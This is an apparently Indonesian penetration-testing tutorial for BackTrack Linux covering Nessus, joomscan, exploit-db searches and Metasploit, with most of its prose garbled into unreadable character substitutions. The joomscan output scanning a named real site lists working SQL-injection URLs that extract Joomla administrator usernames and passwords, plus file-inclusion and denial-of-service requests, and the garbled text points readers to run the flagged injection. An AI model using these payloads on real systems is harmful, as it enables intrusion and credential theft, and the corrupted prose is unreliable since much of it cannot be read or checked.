Jika a#&a i#$i# #ess. -e%ak.ka# a.t, .2&ate -aka &a2at kita k,#+i$.rasika# 2a&a
#ess.s&.c,#+ &e#$a# -e-as.ka# !a%.e I"esJ 2a&a k,#+i$.rasi a.t,F.2&ate
9.%.9. e54/ai ness4s
(#t.k -e-.%ai #ess.s kita har.s -e#"a%aka# &ae-,# ter%e/ih &ah.%..
root@eichel:~#/etc/init.d/nessusd start
Starting Nessus : .
Se2erti "a#$ s.&ah &i .#$kit se/e%.-#"a> #ess.s -er.2aka# #et<,rk !.%#era/i%it"
sca##er /er/asis <e/. B.ka /r,<ser > ke-.&ia# arahka# 2a&a k,#eksi ss% @ htt2s B
&e#$a# -e#$$.#aka# 2,rt 9903 @ #ess.s &e+a.%t 2,rt B.
https://localhost:8834
Ha%a-a# %,$i# Ness.s aka# -.#c.% 2a&a /r,<ser . Ke-.&ia# kita ti#$$a%
-e-as.ka# .ser#a-e &a# 2ass<,r& "a#$ te%ah kita /.at se/e%.-#"a 2a&a taha2
2e-/.ata# .ser
Jika kita te%ah s.kses .#t.k a.the#ti+ikasi .ser> -aka #ess.s sia2 &i$.#aka#.. k%ik
t,-/,% sca## ke-.&ia# a&& #e< sca# &a# isi%ah +,r- "a#$ a&a. Mas.ka# #a-a
.#t.k 2r,ses sca##> &i%a#j.tka# &e#$a# -e-i%ih t"2e sca##.
$. r4n now
A$ar #ess.s %a#$.#$ -e-2r,ses akti+itas sca##i#$ "a#$ te%ah kita #a-ai ta&i
%. sc2ed4/ed ? ;adwa/ @
Me#e#t.ka# ja&<a% sehi#$$a 2r,ses aka# /erja%a# ses.ai &e#$a# ja&<a% "a#$
&ite#t.ka#
9. te56/ate
4r,ses sca# 2a&a 2e#$at.ra# &e+a.%t
4er%. kita -e-i%ih Ipolicy 2 peraturan 3J 2a&a 2r,ses akti+itas sca##i#$ "a#$ /ar.
kita /.at ta&i. Misa%#"a kita ha#"a -e#"eca## jari#$a# kita se#&iri -aka kita s.&ah
sehar.s#"a -e-i%ih Iinternal scann net0orkJ. Da# .#t.k akti+itas <e/ sca##i#$
kita /isa -e#$$.#aka# I/eb Apps testJ
A#&a &a2at -e#$isi sca# tar$et 2a%i#$ /a#"ak 6 tar$et -e#$i#$at kita ha#"a
-e-akai !ersi Ihome userJ. Jika s.&ah -aka akti+asi sca## secara ,t,-atis
%a#$s.#$ &i -.%ai. Jika s.&ah se%esai
sa%ah sat. kek.ra#$a# &a%a- t,,%s i#i a&a%ah 2e-akaia# res,.rce -e-,r" "a#$ &i
2akai. (#t.k -e%ihat IreportsJ> kita t#$$a% -e#eka# Ireports buttonsJ> ke-.&ia#
aka# ter%ihat ta/%e "a#$ /erisi #a-a ,2erasi sca##. (#t.k -e%ihat secara &etai% a#&a
ti#$$a% -e#$k%ik #a-a ,2erasi sca##i#$.
9.9. 0oo5scan
J,,-sca#> a&a%ah t,,%s /.ata# YEHG@YGN Etica% Hacker Gr,.2B "a#$ /er/asis
)=AS4 @ )2e# =e/ A22%icati,# Sec.rit" 4r,ject B "a#$ &i$.#aka# .#t.k
-e%ak.ka# 2e#etrati,# testi#$ terha&a2 C,#te#t Ma#a$e-e#t S"ste- @CMSB
J,,-%aO> J,,-%aO a&a%ah CMS "a#$ seri#$ &i$.#aka# kare#a +%eksi/i%itas#"a> (ser
8rie#&%"> &a# ke-.&aha#ke-.&aha# "a#$ %ai##"a. Me%ihat /a#"ak#"a 2e#$$.#a
terse/.t se-aki# /a#"ak 2.%a Kere#ta#a# @V.%#era/i%t"B 2a&a j,,-%aO> ,%eh kare#a
it. 2r,$ra- i#i &i/.at a$ar -a-2. -e%ak.ka# 2e#caria# ata. 2e#etrasi terha&a2
CMS J,,-%aO &e#$a# /.$ +i%e i#c%.si,#> sU% i#jecti,#> c,--a#& e1ec.ti,#
!.%#era/i%ities> &%%.
*#i aka# -e-/a#t. <e/ &e!e%,2er ata. <e/-aster .#t.k -e#$a-a#ka# sit.s#"a
&ari sera#$a# hacker> Berik.t %a#$kah%a#$kah 2e#$.#aa# a2%ikasi j,,-sca# Q
$. Me-/.ka A2%ikasi j,,-sca# Q
Backtrack > Vulnerability Assessment > Web Assessment >
CMS Vulnerability Identification > joomscan
%. Me-as.ka# (RL j,,-%aO "a#$ aka# &i 2riksa @sca##i#$B Q
root@james0baster:/pentest/web/scanners/joomscan# ./joomscan.pl -u
http://joomla.indonesianbacktrack.or.id/ibt/
Hasil dari printah di atas :
..|''|| '|| '||' '|' | .|'''.| '||''|.
.|' || '|. '|. .' ||| ||.. ' || ||
|| || || || | | || ''|||. ||...|'
'|. || ||| ||| .''''|. . '|| ||
''|...|' | | .|. .||. |'....|' .||.

=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.3-b
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================
Vulnerability Entries: 611
Last update: February 2, 2012
Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan
Target: http://joomla.indonesianbacktrack.or.id/ibt
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.14
## Checking if the target has deployed an Anti-Scanner measure
[!] Scanning Passed ..... OK
## Detecting Joomla! based Firewall ...
[!] No known firewall detected!
## Fingerprinting in progress ...
~Generic version family ....... [1.5.x]
~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]
* Deduced version range is : [1.5.12 - 1.5.14]
## Fingerprinting done.
## 8 Components Found in front page ##
com_content com_newsfeeds
com_weblinks com_user com_registration
com_mailto com_banners com_poll
Vulnerabilities Discovered
==========================
# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so
exploiting is more likely to succeed.
Vulnerable? Yes
# 2
Info -> Generic: Unprotected Administrator directory
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can
bruteforce administrator accounts. Read:
http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO
%20PROTECT.pdf
Vulnerable? Yes
# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator
application. Affected administrator components include com_admin,
com_media, com_search. Both com_admin and com_search contain XSS
vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No
# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be
under ssl), Joomla! does not set the SSL flag on the cookie. This can
allow someone monitoring the network to find the cookie related to the
session.
Vulnerable? No
# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly
escaped. Most strings in question were sourced from the administrator
panel. Malicious normal admin can leverage it to gain access to super
admin.
Vulnerable? No
# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No
# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No
# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered
Vulnerability
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be
executed in the context of targeted user browser, allowing the attacker
to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No
# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be
executed in the context of targeted user browser.
Vulnerable? No
# 10
Info -> Core: Authentication Bypass Vulnerability
Exploit: Backend accepts any password for custom Super Administrator when
LDAP enabled
Vulnerable? No
# 11
Info -> Core: Path Disclosure Vulnerability
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No
# 12
Info -> Core: User redirected Spamming Vulnerability
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No
# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No
# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Exploit: It requires an administrator to be logged in and to be tricked
into a specially crafted webpage.
Vulnerable? Yes
# 15
Info -> Core: Path Disclosure Vulnerability
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No
# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory
Traversal Vulnerability
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to
/plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No
# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships
with Joomla! 1.5.
Vulnerable? No
# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No
# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in
fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes
# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?
option=com_user&view=reset&layout=confirm 2. Write into field "token"
char ' and Click OK. 3. Write new password for admin 4. Go to url :
target.com/administrator/ 5. Login admin with new password
Vulnerable? No
# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?
option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,co
ncat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos
_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No
# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho
%20md5(911)%3B
Vulnerable? No
# 23
Info -> CoreComponent: com_admin File Inclusion Vulnerability
Versions Affected: N/A
Check: /administrator/components/com_admin/admin.admin.html.php
Exploit: /administrator/components/com_admin/admin.admin.html.php?
mosConfig_absolute_path=
Vulnerable? No
# 24
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(
username,char(58),password)
+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
&Itemid=1
Vulnerable? No
# 25
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No
# 26
Info -> CoreComponent: com_content XSS Vulnerability
Exploit: The defaults on com_content article submission allow entry of
dangerous HTML tags (script, etc). This only affects users with access
level Author or higher, and only if you have not set filtering options in
com_content configuration.
Vulnerable? No
# 27
Info -> CoreComponent: com_weblinks XSS Vulnerability
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into
the title and description tags for weblink submissions (from both the
administrator and site submission forms).
Vulnerable? No
# 28
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Exploit: The mailto component does not verify validity of the URL prior
to sending.
Vulnerable? No
# 29
Info -> CoreComponent: com_content view=archive SQL Injection
Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Exploit: Unfiltered POST vars - filter, month, year to /index.php?
option=com_content&view=archive
Vulnerable? No
# 30
Info -> CoreComponent: com_content XSS Vulnerability
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No
# 31
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? No
# 32
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No
# 33
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS
Vulnerability
Check: /components/com_poll/
Exploit: Send request /index.php?
option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No
# 34
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Check: /components/com_banners/
option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?
option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? Yes
# 35
Info -> CoreComponent: com_mailto timeout Vulnerability
Exploit: [Requires a valid user account] In com_mailto, it was possible
to bypass timeout protection against sending automated emails.
Vulnerable? Yes
# 36
Info -> Component: hwdVideoShare SQL Injection Vulnerability
Check: /components/com_hwdvideoshare/
option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-
9999999+UNION+SELECT+000,111,222,333,concat(0x1e,username,0x3a,password,0
x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2+FROM+jos_users
+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No
# 37
Info -> Component: JUser File Inclusion Vulnerability
Versions effected: 1.0.14 and older
Check: /components/com_juser/
Exploit: /components/com_juser/xajax_functions.php?
Vulnerable? No
# 38
Info -> Component: JContentSubscription File Inclusion Vulnerability
Check: /components/com_jcs/
Exploit: /components/com_jcs/jcs.function.php?mosConfig_absolute_path=
Vulnerable? No
# 39
Info -> Component: com_idoblog SQL Injection Vulnerability
Version Affected: b24<=
Check: /components/com_idoblog/
option=com_idoblog&task=userblog&userid=42+and+1=1+UNION+SELECT+1,1,1,1,1,
concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,
1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
-
Vulnerable? No
# 40
Info -> Component: JContentSubscription File Inclusion Vulnerability
Check: /administrator/components/com_jcs/
Exploit: /administrator/components/com_jcs/jcs.function.php?
Vulnerable? No
# 41
Info -> Component: JUser File Inclusion Vulnerability
Check: /administrator/components/com_juser/
Exploit: /administrator/components/com_juser/xajax_functions.php?
Vulnerable? No
# 42
Info -> Component: com_juser SQL Injection Vulnerability
Check: /components/com_juser/
option=com_juser&task=show_profile&id=+and+1=2+union+select+1,2,concat(us
ername,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users+whe
re+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No
# 43
Info -> Component: Dada Mail Manager Component Remote File Inclusion
Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?
GLOBALS[mosConfig_absolute_path]=
Vulnerable? No
# 44
Info -> Component: Joomla Component com_jomtube (user_id) Blind SQL
Injection / SQL Injection
Check: /index.php?view=videos&type=member&user_id=-
62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,pass
word),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--
&option=com_jomtube
Exploit: /index.php?view=videos&type=member&user_id=-
62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,pass
word),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--
&option=com_jomtube
Vulnerable? Yes
# 45
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union
%20select%201,concat%28username,char%2858%29,password
%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,
30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-
1%20union%20select%201,concat%28username,char%2858%29,password
%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,
30%20from%20jos_users--
Vulnerable? No
# 46
Info -> Component: SmartSite Local File Inclusion
Versions Affected: Any <=
Check: /index.php?option=com_smartsite&controller=
Exploit: /index.php?option=com_smartsite&controller=
Vulnerable? No
# 47
Info -> Component: Joomla Component com_searchlog SQL Injection
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No
# 48
Info -> Component: Joomla Component com_djartgallery Multiple
Vulnerabilities
Check: /administrator/index.php?
option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Exploit: /administrator/index.php?
option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Vulnerable? N/A
There are 7 vulnerable points in 48 found entries!
~[*] Time Taken: 1 min and 15 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net
Ter%ihat 2a&a hasi% ke%.ara# 33 -e-/eritah. /ah<a -e-i%iki /.$ "a#$ akti+ &e#$a#
&i ta#&ai ,,%eh I(4/nerab/eZ :esJ &i-a#a ter&a2at /.$ SDL *#jecti,# a&a
c,-2,#e#ts j,,-%aO. Di-a#a c,-2,#e#t terse/.t /er#a-a j,-t./e 2a&a 2eri#tah
$et &i !aria/%e +ee&i&.
9. Me#$eksek.si hasi% &ari j,,-sca# Q
Ja%a#ka# Br,<ser &a# isi (RL "$ &i /erika# ,%eh hasi% j,,-sca#> .#t.k -e%ihat .ser
&a# 2ass<,r& j,,-%a a#&a.
). E<6/oit Database
@ffensive security se/a$ai &e!e%,2er Backtrack %i#.1 s.&ah -e-2ersia2ka# %xploit
database "a#$ ter&iri &ari /er/a$ai k.-2.%a# e12%,it &ari /er/a$ai e12%,iter &a#
2e#tester /aik .#&er$r,.#& -a.2.# ti&ak. K.-2.%a# e12%,it terse/.t /isa a#&a
te-.ka# 2a&a a%a-at htt2QAA<<<.e12%,it&/.c,-A.
E12%,it&/ te%ah &i &,k.-e#tasika# &i&a%a- /acktrack%i#.1 "a#$ /isa &i&a2atka#
2a&a &irekt,ri
r,,tSeiche%QA2e#testAe12%,itsAe12%,it&/
).$. encari E<6/oit tertent4
Usage: searchsploit [term1] [term2] [term3]
Example: searchsploit oracle windows local
root@eichel:/pentest/exploits/exploitdb# ./searchsploit oracle windows
local
Description
Path
------------------------------------------------------------------------
--- -------------------------
Oracle Database Server <= 10.1.0.2 Buffer Overflow Exploit
/windows/local/932.sql
Oracle Database PL/SQL Statement Multiple SQL Injection Exploits
/windows/local/933.sql
Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit
/windows/local/1455.txt
Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)
/windows/local/3451.c
Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit
/windows/local/16169.py
(#t.k -e#cari e12%,it "a#$ &it.j. kita /isa -e#$$.#aka# +asi%itas search > se/a$ai c,#t,h sa"a -e#cari
e12%,it /er/asis j,,-%a &e#$a# ter- ' ^ c,-2,#e#t &a# ter- 0 ^ R8*
root@eichel:/pentest/exploits/exploitdb# ./searchsploit joomla Component
RFI
Description
Path
------------------------------------------------------------------------
Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability
/php/webapps/3557.txt
Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability
Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities
Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI
Joomla Flash Image Gallery Component RFI Vulnerability
Joomla Component JContentSubscription 1.5.8 Multiple RFI Vulns
Joomla Component Carousel Flash Image Gallery RFI Vulnerability
Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities
Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability
Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability
Joomla Component com_facileforms 1.4.4 RFI Vulnerability
Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability
Joomla Component Flash Tree Gallery 1.0 RFI Vulnerability
Joomla Component VirtueMart Google Base 1.1 RFI Vulnerability
Joomla Component ongumatimesheet20 4b RFI Vulnerability
Joomla Component Dada Mail Manager 2.6 RFI Vulnerability
Joomla Component Clickheat 1.0.1 Multiple RFI Vulnerabilities
Joomla Component Recly!Competitions 1.0.0 Multiple RFI Vulnerabilities
Joomla Component Feederator 1.0.5 Multiple RFI Vulnerabilities
Joomla Component Simple RSS Reader 1.0 RFI Vulnerability
Joomla Component com_media_library 1.5.3 RFI Vulnerability
Joomla Component com_realestatemanager 1.0 RFI Vulnerability
Joomla Component com_vehiclemanager 1.0 RFI Vulnerability
Joomla Component (com_sef) RFI
"A" -
ETASP'OIT
Oleh : zee eichel
$. Pen1ena/an
Metas2%,it a&a%ah Iopen6source pro8ectJ Se/.ah a2%ikasi "a#$ -e#"e&iaka#
i#+,r-asi te#ta#$ kere#ta#a# kea-a#a# &a# a%at /a#t. &a%a- 2e#$.jia# 2e#etrasi
&a# ID* signatures development. Sa%ah sat.#"a a&a%ah -etas2%,it +ra-e<,rk.
Metas2%,it +ra-e<,rk se#&iri se/e#ar#"a a&a%ah se/.ah a%at "a#$ &i$.#aka# .#t.k
2e#$e-/a#$a# seka%i$.s esek.si k,&e eks2%,itasi terha&a2 -esi# tar$et &ari jarak
ja.h.
$.$ Se;ara2 dan toko2 di ba/ik /a7ar
Metas2%,it &ici2taka# 2erta-a ka%i ,%eh ?D &oore 2a&a tah.# ';;0 se/a$ai se/.ah
a%at jari#$a# 2,rta/%e -e#$$.#aka# /ahasa 2e-,$ra-a# 2er%. Ke-.&ia# Metas2%,it
&i /a#$.# ke-/a%i &a%a- /ahasa 2e-,$ra-a# ruby. 4a&a ta#$$a% '1 )kt,/er ';;:
-etas2%,it -e#$.-.-ka# /ah<a se/.ah 2er.sahaa# kea-a#a# k,-2.ter /er#a-a
ra2i&7 te%ah -e#ja&i &e!e%,2 &ari 2r,"ek -etas2%,it.
$.%. Da3tar seri dan =ersi 5etas6/oit
$. Metas2%,it 0.; 2a&a N,!er-/er ';;6
%. Metas2%,it 3.; 2a&a A$.st.s ';11
$.9 etas6/oit 6ada backtrack /in4<
Ber.#t.#$ /a$i -ereka 2e#$$.#a /acktrack kare#a -etas2%,it te%ah teri#sta%% secara
&e+a.%t &i -.%ai &ari !ersi /acktrack *V &a# 2a&a /acktrack !ersi terakhir saat /.k.
i#i &it.%is "ait. /acktrack V R1. 4r,"ek -etas2%,it 2a&a /acktrack &i /eri #a-a
I-etas2%,it .#%eashe&J -er.2aka# a2%ikasi -etas2%,it +ra-e<,rk &e#$a# /er/a$ai
a2%ikasi 2e#&.k.#$ "a#$ -.&ah &i akses ta#2a har.s -e%ak.ka# 2e#$i#sta%a# "a#$
/er/e%it E /e%it.
$.) Fi/e siste5 dan /ibrar7
8i%e s"ste- 2a&a MS8 &itata secara i#t.iti+ ,%eh &irekt,ri E &irekt,ri &i /a<ah i#i
Ddata Q +i%e +i%e e&ita/%e "a#$ &i $.#aka# ,%eh -etas2%,it
[root@bt data]$ ls
armitage gui meterpreter snmp
vncdll.x64.dll
cpuinfo ipwn msfcrawler sounds
wmap
eicar.com isight.bundle msfpescan sql
wordlists
eicar.txt java passivex svn
emailer_config.yaml john php templates
exploits lab post vncdll.dll
Ddoc45entation Q Me#"e&iaka# te#ta#$ &,k.-e#tasi -e#$e#ai +ra-e<,rk
[root@bt documentation]$ ls
developers_guide.pdf msfopcode.txt samples
gendocs.sh msfrpc.txt
users_guide.pdf
metasploit2 posix_meterpreter.txt
users_guide.tex
msfconsole_rc_ruby_example.rc rpm wmap.txt

De<terna/ Q s,.rce c,&e &a# thir&2art" %i/raries
[zee@zee external]$ ls
burp-proxy ruby-kissfft ruby-lorcon2 source
pcaprub ruby-lorcon serialport
D/ib Q *#ti &ari +ra-e<,rk c,&e /ase
[root@bt lib]$ ls
active_record nessus rex.rb
active_record.rb net rex.rb.ts.rb
active_support openvas rkelly
active_support.rb packetfu rkelly.rb
anemone packetfu.rb snmp
anemone.rb postgres snmp.rb
bit-struct postgres_msf.rb sshkey
bit-struct.rb postgres_msf.rb.ut.rb sshkey.rb
enumerable.rb rabal telephony
fastlib.rb rapid7 telephony.rb
lab rbmysql
windows_console_color_support.rb
metasm rbmysql.rb zip
metasm.rb rbreadline.rb zip.rb
msf readline_compatible.rb
msf3 rex
D5od4/es Q /erisi -,&.%-,&.%e -etas2%,it
[root@bt modules]$ ls
auxiliary encoders exploits modules.rb.ts.rb nops payloads
post
D6/41ins Q /erisi 2%.$i#2%.$i# 2e#&.k.#$
[zee@zee plugins]$ ls
auto_add_route.rb ips_filter.rb openvas.rb thread.rb
db_credcollect.rb lab.rb pcap_log.rb
token_adduser.rb
db_tracker.rb msfd.rb sample.rb
token_hunter.rb
editor.rb msgrpc.rb session_tagger.rb wmap.rb
event_tester.rb nessus.rb socket_logger.rb
ffautoregen.rb nexpose.rb sounds.rb
Dscri6ts Q Meter2reter &a# scri2t %ai##"a
[zee@zee scripts]$ ls
meterpreter resource shell
Dtoo/s Q Ber/a$ai .ti%itas %ai##"a
[zee@zee tools]$ ls
context module_author.rb nasm_shell.rb
convert_31.rb module_changelog.rb pack_fastlib.sh
exe2vba.rb module_disclodate.rb pattern_create.rb
exe2vbs.rb module_license.rb pattern_offset.rb
find_badchars.rb module_mixins.rb payload_lengths.rb
halflm_second.rb module_ports.rb profile.sh
import_webscarab.rb module_rank.rb reg.rb
list_interfaces.rb module_reference.rb verify_datastore.rb
lm2ntcrack.rb module_targets.rb vxdigger.rb
memdump msf_irb_shell.rb vxencrypt.rb
metasm_shell.rb msftidy.rb vxmaster.rb
%. ETASP'OIT FUNDAETA'
Metas2%,it +ra-e<,rk -e-i%iki /a#"ak ,2si &a# -e-i%iki /a#"ak i#ter+ace.
*#ter+acei#ter+ace "a#$ &i ta<arka# terse/.t -e-i%iki /a#"ak ke%e/iha#ke%e/iha#
&a# kek.ra#$a###"a. Ms+c,#s,%e se/e#ar#"a a&a%ah s.at. 2e-ersat. &ari /er/a$ai
i#ter+ace @ aplikasi frame0ork B sehi#$$a kita &a2at -e#$akses se%.r.h a2%ikasi 2a&a
-etas2%,it seka%i$.s -e-a&.ka##"a sat. sa-a %ai#.
%.$. 5s3c/i
5s3c/i -er.2aka# command line interface @ c/i B 2a&a +ra-e<,rk > &e#$a# kata %ai#
-e#$$.#aka# -etas2%,it &e#$a# c,--a#& %i#e ata. 2eri#tah2eri#tah -a#.a% 2a&a
shell.
%.$.$. 5s3c/i 2e/6 co55and
Sa"a aka# -e#$a-/i% c,#t,h se&erha#a 2e#$$.#aa# -s+c%i> "ait. 2a&a e12%,it
5s>AR>.&Rneta6i "a#$ ters,h,r. E12%,it i#i -e-a#+aatka# ter/.ka #"a 2,rt s-/
"a#$ ter&a2at 2a&a <i#&,<s. Di-a#a 2,rt s-/ &i $.#aka# se/a$ai ser!ice sharri#$
+,%&er> a2%ikasi &a# &e!ice %ai##"a @ 2ri#ter> sca##er &%% B
%.$.%. e5eriksa keb4t42an in3or5asi
(#t.k -e%ihat ,2si,2si a2a saja "a#$ har.s &i -as.ka# 2a&a se/.ah ,2erasi -s+c%i
kita /isa -e#$$.#aka# ,2si IOJ
K,%,- #a-a ^ -er.2aka# je#is ,2si
C.rre#t setti#$ ^ -er.2aka# &e+a.%t setti#$ @ jika ti&ak &i isika# B
ReU.ire& ^ Kehar.sa# 2a&a 2e-akaia#
Descri2ti,# ^ Ketera#$a# ,2si "a#$ &i $.#aka#.
%.$.9. Ko56etibe/ Pa7/oad ? P @
)2si IPJ &i$.#aka# .#t.k -e%ihat payload6payload a2a saja "a#$ -.#$ki# &i
$.#aka# 2a&a e12%,it i#i.
%.$.). Conto2 seran1an dan 6en114naan
4erhatika# sa"a -e-as.ka# 2eri#tah -s+c%i &e#$a# +,r-at Q
msfcli [ exploit ]-- [ RHOST ]--[ PAYLOAD ] E
&i-a#a Q
E12%,it ^ 'indo'sCsmbCms0#V06!Vnetapi
e12%,it "a#$ &i$.#aka# /era&a 2a&a &irekt,ri
windows/smb/ms08_067_netapi
root@eichel:/pentest/exploits/framework/modules/exploits/windows
/smb# ls -al
total 196
drwxr-xr-x 3 root root 4096 2012-02-21 08:50 .
drwxr-xr-x 49 root root 4096 2012-02-12 02:11 ..
-rw-r--r-- 1 root root 2822 2012-02-21 08:50
ms03_049_netapi.rb
-rw-r--r-- 1 root root 7826 2012-02-21 08:50
ms04_007_killbill.rb
-rw-r--r-- 1 root root 4620 2012-02-21 08:50 ms04_011_lsass.rb
-rw-r--r-- 1 root root 2653 2012-02-21 08:50
ms04_031_netdde.rb
-rw-r--r-- 1 root root 16074 2012-02-21 08:50 ms05_039_pnp.rb
-rw-r--r-- 1 root root 5608 2012-02-21 08:50
ms06_025_rasmans_reg.rb
-rw-r--r-- 1 root root 3207 2012-02-21 08:50 ms06_025_rras.rb
-rw-r--r-- 1 root root 8575 2012-02-21 08:50 ms06_040_netapi.rb
